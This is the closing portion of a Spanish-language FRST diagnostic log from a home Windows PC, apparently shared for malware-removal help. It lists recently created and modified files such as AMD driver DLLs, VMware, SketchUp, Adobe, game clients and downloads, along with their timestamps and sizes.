C:\Windows\SysWOW64\amdpcom32.dll 2020-04-01 21:42 - 2020-04-01 21:42 - 065743032 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\Drivers\atikmdag.sys 2020-04-01 21:42 - 2020-04-01 21:42 - 041844920 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdxn64.dll 2020-04-01 21:42 - 2020-04-01 21:42 - 037140664 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdxn32.dll 2020-04-01 21:42 - 2020-04-01 21:42 - 024173752 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdvlk64.dll 2020-04-01 21:42 - 2020-04-01 21:42 - 020606648 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdvlk32.dll 2020-04-01 21:42 - 2020-04-01 21:42 - 000150200 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atisamu64.dll 2020-04-01 21:42 - 2020-04-01 21:42 - 000140472 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdmmcl6.dll 2020-04-01 21:42 - 2020-04-01 21:42 - 000127160 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atisamu32.dll 2020-04-01 21:42 - 2020-04-01 21:42 - 000118456 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdmmcl.dll 2020-04-01 21:42 - 2020-04-01 21:42 - 000061624 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\Drivers\ati2erec.dll 2020-04-01 21:36 - 2020-04-01 21:36 - 049841848 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\atio6axx.dll 2020-04-01 21:36 - 2020-04-01 21:36 - 041540280 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\atioglxx.dll 2020-04-01 21:31 - 2020-04-01 21:31 - 001584824 _____ (AMD) C:\Windows\system32\coinst_19.50.dll 2020-04-01 21:30 - 2020-04-01 21:30 - 013037576 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atiumd64.dll 2020-04-01 21:30 - 2020-04-01 21:30 - 010363144 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atiumdag.dll 2020-04-01 21:30 - 2020-04-01 21:30 - 004576440 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\amfrt64.dll 2020-04-01 21:30 - 2020-04-01 21:30 - 004085944 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\amfrt32.dll 2020-04-01 21:30 - 2020-04-01 21:30 - 000544952 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdmcl64.dll 2020-04-01 21:30 - 2020-04-01 21:30 - 000374968 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdmcl32.dll 2020-04-01 21:30 - 2020-04-01 21:30 - 000211464 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atiuxp64.dll 2020-04-01 21:30 - 2020-04-01 21:30 - 000193936 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atiu9p64.dll 2020-04-01 21:30 - 2020-04-01 21:30 - 000188664 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\amdihk64.dll 2020-04-01 21:30 - 2020-04-01 21:30 - 000176432 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atiuxpag.dll 2020-04-01 21:30 - 2020-04-01 21:30 - 000158264 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\amdihk32.dll 2020-04-01 21:30 - 2020-04-01 21:30 - 000156880 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atiu9pag.dll 2020-04-01 21:30 - 2020-04-01 21:30 - 000011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\detoured.dll 2020-04-01 21:30 - 2020-04-01 21:30 - 000011136 _____ (Microsoft Corporation) C:\Windows\system32\detoured.dll 2020-04-01 21:29 - 2020-04-01 21:29 - 001721528 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\atiadlxx.dll 2020-04-01 21:29 - 2020-04-01 21:29 - 001234104 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\atiadlxy.dll 2020-04-01 21:29 - 2020-04-01 21:29 - 001234104 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\atiadlxx.dll 2020-04-01 21:29 - 2020-04-01 21:29 - 000751800 _____ (AMD) C:\Windows\system32\atieclxx.exe 2020-04-01 21:29 - 2020-04-01 21:29 - 000582840 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\Drivers\atikmpag.sys 2020-04-01 21:29 - 2020-04-01 21:29 - 000515256 _____ (AMD) C:\Windows\system32\atiesrxx.exe 2020-04-01 21:29 - 2020-04-01 21:29 - 000504504 _____ (AMD) C:\Windows\system32\atitmm64.dll 2020-04-01 21:29 - 2020-04-01 21:29 - 000484536 _____ C:\Windows\system32\dgtrayicon.exe 2020-04-01 21:29 - 2020-04-01 21:29 - 000482488 _____ C:\Windows\system32\GameManager64.dll 2020-04-01 21:29 - 2020-04-01 21:29 - 000459960 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\atidemgy.dll 2020-04-01 21:29 - 2020-04-01 21:29 - 000442552 _____ C:\Windows\system32\atieah64.exe 2020-04-01 21:29 - 2020-04-01 21:29 - 000365240 _____ C:\Windows\SysWOW64\GameManager32.dll 2020-04-01 21:29 - 2020-04-01 21:29 - 000336568 _____ C:\Windows\SysWOW64\atieah32.exe 2020-04-01 21:29 - 2020-04-01 21:29 - 000232632 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atig6txx.dll 2020-04-01 21:29 - 2020-04-01 21:29 - 000199864 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atigktxx.dll 2020-04-01 21:29 - 2020-04-01 21:29 - 000161464 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atig6pxx.dll 2020-04-01 21:29 - 2020-04-01 21:29 - 000136888 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atiglpxx.dll 2020-04-01 21:29 - 2020-04-01 21:29 - 000136888 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atiglpxx.dll 2020-04-01 21:29 - 2020-04-01 21:29 - 000127160 _____ (AMD) C:\Windows\system32\atimuixx.dll 2020-04-01 21:28 - 2020-04-01 21:28 - 030983352 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdxc64.dll 2020-04-01 21:28 - 2020-04-01 21:28 - 026956984 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdxc32.dll 2020-04-01 21:28 - 2020-04-01 21:28 - 000475320 _____ C:\Windows\system32\amdgfxinfo64.dll 2020-04-01 21:28 - 2020-04-01 21:28 - 000457912 _____ C:\Windows\system32\amdlogum.exe 2020-04-01 21:28 - 2020-04-01 21:28 - 000364728 _____ C:\Windows\SysWOW64\amdgfxinfo32.dll 2020-04-01 21:28 - 2020-04-01 21:28 - 000028344 _____ C:\Windows\system32\Drivers\amdacpksd.sys 2020-04-01 21:20 - 2020-04-01 21:20 - 003471376 _____ C:\Windows\SysWOW64\atiumdva.cap 2020-04-01 21:20 - 2020-04-01 21:20 - 003437632 _____ C:\Windows\system32\atiumd6a.cap 2020-04-01 21:15 - 2020-04-01 21:15 - 000543168 _____ C:\Windows\SysWOW64\atiapfxx.blb 2020-04-01 21:15 - 2020-04-01 21:15 - 000543168 _____ C:\Windows\system32\atiapfxx.blb 2020-04-01 16:33 - 2020-04-01 16:34 - 000000000 ____D C:\Users\Sergio\AppData\Local\VMware 2020-04-01 16:22 - 2020-04-03 12:59 - 000000000 ____D C:\Users\Sergio\AppData\Roaming\VMware 2020-04-01 16:22 - 2020-04-01 16:33 - 000000000 ____D C:\ProgramData\VMware 2020-04-01 16:22 - 2020-04-01 16:22 - 000001427 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VMware Horizon Client.lnk 2020-04-01 16:22 - 2020-04-01 16:22 - 000000000 ____D C:\Program Files\VMware 2020-04-01 16:22 - 2020-04-01 16:22 - 000000000 ____D C:\Program Files\Common Files\VMware 2020-04-01 16:22 - 2020-04-01 16:22 - 000000000 ____D C:\Program Files\Common Files\ThinPrint 2020-04-01 16:22 - 2020-04-01 16:22 - 000000000 ____D C:\Program Files (x86)\VMware 2020-04-01 16:22 - 2020-03-04 08:12 - 000083264 _____ (VMware, Inc.) C:\Windows\system32\Drivers\hcmon.sys 2020-03-31 19:42 - 2020-03-31 19:44 - 011829953 _____ C:\Users\Sergio\Downloads\Green Lantern CGTRADER.rar 2020-03-30 10:34 - 2020-03-30 10:34 - 000000000 ____D C:\Users\Sergio\Downloads\RealTemp_370 2020-03-30 10:27 - 2020-03-30 10:28 - 000330853 _____ C:\Users\Sergio\Downloads\RealTemp_370.zip 2020-03-29 22:04 - 2020-03-29 22:04 - 655097232 _____ C:\Users\Sergio\Downloads\The.Walking.Dead.610x12.m720p.es_SerieMega.Com.mkv 2020-03-27 19:25 - 2020-03-27 19:25 - 077670953 _____ C:\Users\Sergio\Downloads\Luigi's Mansion.zip 2020-03-24 01:46 - 2020-03-24 01:46 - 000000000 ____D C:\Users\Sergio\AppData\Roaming\Trimble Connect for SketchUp 2020-03-23 20:05 - 2020-03-23 20:05 - 000028184 _____ C:\Users\Sergio\Documents\espejo.stl 2020-03-23 19:19 - 2020-03-23 20:38 - 001361611 _____ C:\Users\Sergio\Desktop\espejo.skp 2020-03-23 18:20 - 2020-03-23 18:20 - 000000000 ____D C:\Users\Sergio\AppData\Roaming\SketchUp 2020-03-23 18:20 - 2020-03-23 18:20 - 000000000 ____D C:\Users\Sergio\AppData\Local\SketchUp 2020-03-23 18:13 - 2020-03-23 18:13 - 000000000 ____D C:\ProgramData\Reprise 2020-03-23 18:12 - 2020-04-19 22:03 - 000000000 ____D C:\ProgramData\SketchUp 2020-03-23 15:09 - 2020-03-27 19:28 - 000000000 ____D C:\Users\Sergio\AppData\Local\MatterControl 2020-03-23 15:09 - 2020-03-23 15:09 - 000000000 ____D C:\Users\Sergio\AppData\Local\IsolatedStorage 2020-03-23 04:36 - 2020-03-23 04:36 - 000000000 ____D C:\Users\Sergio\Documents\tftactics ==================== Un mes (modificado) ================== (Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.) 2020-04-20 11:21 - 2019-11-07 00:35 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys 2020-04-20 11:03 - 2009-07-14 06:45 - 000030208 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2020-04-20 11:03 - 2009-07-14 06:45 - 000030208 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2020-04-20 10:52 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\inf 2020-04-20 10:48 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2020-04-20 10:47 - 2014-05-09 04:22 - 000065536 _____ C:\Windows\system32\spu_storage.bin 2020-04-20 10:25 - 2014-09-04 19:17 - 000000000 ____D C:\Desarrollo 2020-04-20 10:21 - 2017-08-16 20:55 - 000000000 ____D C:\Librerias Kontakt 2020-04-20 09:24 - 2014-04-08 19:28 - 000000000 ____D C:\Users\Sergio\AppData\Local\ElevatedDiagnostics 2020-04-20 09:14 - 2019-07-28 15:32 - 000000000 ____D C:\Windows\CryptoGuard 2020-04-20 09:14 - 2019-07-28 15:32 - 000000000 ____D C:\ProgramData\HitmanPro.Alert 2020-04-20 09:14 - 2014-10-03 17:25 - 000000000 ____D C:\ProgramData\HitmanPro 2020-04-20 08:42 - 2020-02-06 21:02 - 000000000 ____D C:\Users\Sergio\Desktop\Impresora 3D 2020-04-20 08:31 - 2014-04-04 20:52 - 000000000 ____D C:\Windows\Minidump 2020-04-20 02:13 - 2019-01-02 14:22 - 000000000 ____D C:\Users\Sergio\AppData\Local\CrashDumps 2020-04-20 01:06 - 2014-07-08 17:01 - 000007607 _____ C:\Users\Sergio\AppData\Local\Resmon.ResmonCfg 2020-04-19 23:54 - 2018-06-22 17:56 - 000000000 ____D C:\Users\Sergio\AppData\Local\0ad 2020-04-19 22:57 - 2014-06-07 20:14 - 000000000 ____D C:\Program Files\Adobe 2020-04-19 22:57 - 2014-04-05 00:06 - 000000000 ____D C:\Users\Sergio\AppData\Roaming\Adobe 2020-04-19 22:27 - 2014-06-07 20:10 - 000000000 ____D C:\Program Files\Common Files\Adobe 2020-04-19 22:13 - 2018-09-15 19:32 - 000000000 ____D C:\Program Files (x86)\NCH Software 2020-04-19 21:52 - 2019-08-07 18:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pixologic 2020-04-19 21:12 - 2018-06-25 16:23 - 000000000 ____D C:\ProgramData\HP 2020-04-19 21:12 - 2018-06-25 16:23 - 000000000 ____D C:\Program Files (x86)\HP 2020-04-19 21:11 - 2014-04-04 17:04 - 000000000 ____D C:\Program Files (x86)\Google 2020-04-19 21:10 - 2016-02-26 02:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOG.com 2020-04-19 21:09 - 2018-07-03 19:08 - 000000000 ____D C:\Users\Sergio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Twitch Games 2020-04-19 21:05 - 2015-04-21 19:25 - 000000000 ____D C:\ProgramData\Apple 2020-04-19 20:51 - 2017-08-15 22:52 - 000000000 ____D C:\Users\Sergio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line 2020-04-19 20:47 - 2016-02-26 02:05 - 000000000 ____D C:\ProgramData\GOG.com 2020-04-19 20:47 - 2016-02-26 02:05 - 000000000 ____D C:\Program Files (x86)\GalaxyClient 2020-04-19 20:44 - 2014-10-05 16:57 - 000000000 ____D C:\ProgramData\Sony 2020-04-19 12:04 - 2014-05-11 17:05 - 000000000 ____D C:\Windows\SysWOW64\Macromed 2020-04-19 11:55 - 2019-07-30 13:25 - 000000000 ____D C:\Users\Sergio\AppData\Local\Overwolf 2020-04-18 00:18 - 2014-04-09 19:16 - 000000000 ____D C:\Program Files\AMD 2020-04-17 23:36 - 2014-05-09 04:51 - 000000000 ____D C:\Program Files (x86)\AMD 2020-04-17 23:25 - 2014-04-09 19:06 - 000000000 ____D C:\AMD 2020-04-17 22:47 - 2019-11-13 09:28 - 000002115 _____ C:\Windows\epplauncher.mif 2020-04-17 22:47 - 2014-04-09 19:08 - 000000000 ____D C:\ProgramData\Package Cache 2020-04-17 21:29 - 2009-07-14 06:45 - 005191808 _____ C:\Windows\system32\FNTCACHE.DAT 2020-04-17 20:44 - 2015-02-18 17:41 - 000094208 _____ (Etron Technology Inc) C:\Windows\system32\Drivers\EtronXHCI.sys 2020-04-17 17:57 - 2014-04-04 17:04 - 000142920 _____ C:\Users\Sergio\AppData\Local\GDIPFONTCACHEV1.DAT 2020-04-17 12:56 - 2019-01-05 00:17 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2020-04-17 12:55 - 2009-07-14 05:20 - 000000000 ____D C:\Program Files\Common Files\Microsoft Shared 2020-04-17 12:54 - 2014-05-31 11:37 - 000000000 ____D C:\Program Files\Microsoft Office 2020-04-16 00:56 - 2014-05-31 11:56 - 000000039 _____ C:\Windows\vbaddin.ini 2020-04-14 21:20 - 2018-03-14 22:20 - 000004492 _____ C:\Windows\system32\Tasks\Adobe Flash Player NPAPI Notifier 2020-04-14 21:20 - 2014-05-11 17:05 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe 2020-04-14 21:20 - 2014-05-11 17:05 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2020-04-14 21:20 - 2014-05-11 17:05 - 000004320 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater 2020-04-14 21:20 - 2014-05-11 17:05 - 000000000 ____D C:\Windows\system32\Macromed 2020-04-14 20:54 - 2014-04-09 19:30 - 000000000 ____D C:\Users\Sergio\AppData\Roaming\vlc 2020-04-14 20:38 - 2020-02-25 21:56 - 000002339 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brave.lnk 2020-04-14 20:38 - 2020-02-25 21:56 - 000002298 _____ C:\Users\Public\Desktop\Brave.lnk 2020-04-14 20:38 - 2020-02-25 21:56 - 000002298 _____ C:\ProgramData\Desktop\Brave.lnk 2020-04-14 20:20 - 2009-07-14 11:26 - 000754992 _____ C:\Windows\system32\perfh00A.dat 2020-04-14 20:20 - 2009-07-14 11:26 - 000161604 _____ C:\Windows\system32\perfc00A.dat 2020-04-14 20:20 - 2009-07-14 07:13 - 001715604 _____ C:\Windows\system32\PerfStringBackup.INI 2020-04-08 14:08 - 2019-05-10 23:36 - 000000000 ____D C:\Users\Public\Documents\Wondershare 2020-04-08 14:08 - 2019-05-10 23:36 - 000000000 ____D C:\ProgramData\Documents\Wondershare 2020-04-08 12:26 - 2018-02-03 20:32 - 000000000 ___RD C:\Users\Sergio\Desktop\Boda 2020-04-03 12:59 - 2015-09-01 19:53 - 000000000 ____D C:\Users\Sergio\AppData\Local\CEF 2020-04-02 12:22 - 2019-07-16 16:54 - 000000000 ____D C:\Users\Sergio\AppData\Roaming\learn2play 2020-04-02 01:49 - 2014-04-04 18:17 - 000744808 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe 2020-04-01 18:26 - 2009-07-14 06:57 - 000001547 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2020-04-01 17:32 - 2018-06-23 17:11 - 000000000 ____D C:\Users\Sergio\AppData\Roaming\discord 2020-04-01 16:36 - 2009-07-14 07:32 - 000000000 ____D C:\Windows\system32\FxsTmp 2020-04-01 16:29 - 2016-01-08 18:32 - 000000000 ____D C:\Users\Sergio\AppData\Roaming\WTablet 2020-03-29 13:14 - 2019-07-30 13:27 - 000000000 ____D C:\Users\Sergio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Overwolf 2020-03-27 17:36 - 2019-07-30 13:26 - 000000000 ____D C:\Program Files (x86)\Overwolf 2020-03-21 14:49 - 2014-04-04 17:55 - 000003536 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA 2020-03-21 14:49 - 2014-04-04 17:55 - 000003408 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore ==================== Archivos en la raíz de algunos directorios ======== 2017-08-15 18:18 - 2017-08-15 18:22 - 002722286 _____ () C:\Program Files (x86)\Auto-Tune 8 Manual.pdf 2017-08-15 18:18 - 2017-08-15 18:22 - 000056051 _____ () C:\Program Files (x86)\VST PC Read Me.pdf 2019-03-15 19:17 - 2019-07-28 15:20 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat 2017-10-31 20:25 - 2017-10-31 20:25 - 000000171 _____ () C:\Users\Sergio\AppData\Roaming\1eb766f2-fed1-4d33-9c39-2c8a972fd11f 2017-10-31 20:25 - 2017-10-31 20:25 - 000000163 _____ () C:\Users\Sergio\AppData\Roaming\4e93aa11-2d46-4980-a421-0a4ac759e5bf 2017-10-31 20:25 - 2017-10-31 20:25 - 000000175 _____ () C:\Users\Sergio\AppData\Roaming\fc19ece2-6b3f-4f22-8758-9651ab9ca388 2017-07-13 00:43 - 2017-07-13 00:43 - 000937776 _____ (AutoIt Team) C:\Users\Sergio\AppData\Roaming\FgYF.exe 2015-03-09 01:46 - 2019-12-24 20:12 - 000000132 _____ () C:\Users\Sergio\AppData\Roaming\Prefs. de formato PNG de Adobe CS6 2015-08-29 17:18 - 2015-08-29 17:18 - 000001456 _____ () C:\Users\Sergio\AppData\Local\Adobe Guardar para Web 13.0 Prefs 2019-01-19 04:07 - 2019-01-19 04:08 - 000025039 _____ () C:\Users\Sergio\AppData\Local\kritacrash.log 2020-02-11 00:44 - 2020-02-11 00:44 - 000000039 _____ () C:\Users\Sergio\AppData\Local\kritadisplayrc 2019-01-18 19:34 - 2020-02-11 00:44 - 000017005 _____ () C:\Users\Sergio\AppData\Local\kritarc 2015-02-18 17:57 - 2015-02-18 17:57 - 000000001 _____ () C:\Users\Sergio\AppData\Local\llftool.4.40.agreement 2019-04-17 17:43 - 2019-04-19 00:05 - 000000128 _____ () C:\Users\Sergio\AppData\Local\PUTTY.RND 2014-07-08 17:01 - 2020-04-20 01:06 - 000007607 _____ () C:\Users\Sergio\AppData\Local\Resmon.ResmonCfg ==================== SigCheck ============================ (No existe una corrección automática para los archivos que no pasan la verificación.) LastRegBack: 2020-04-19 14:49 ==================== Final de FRST.txt ========================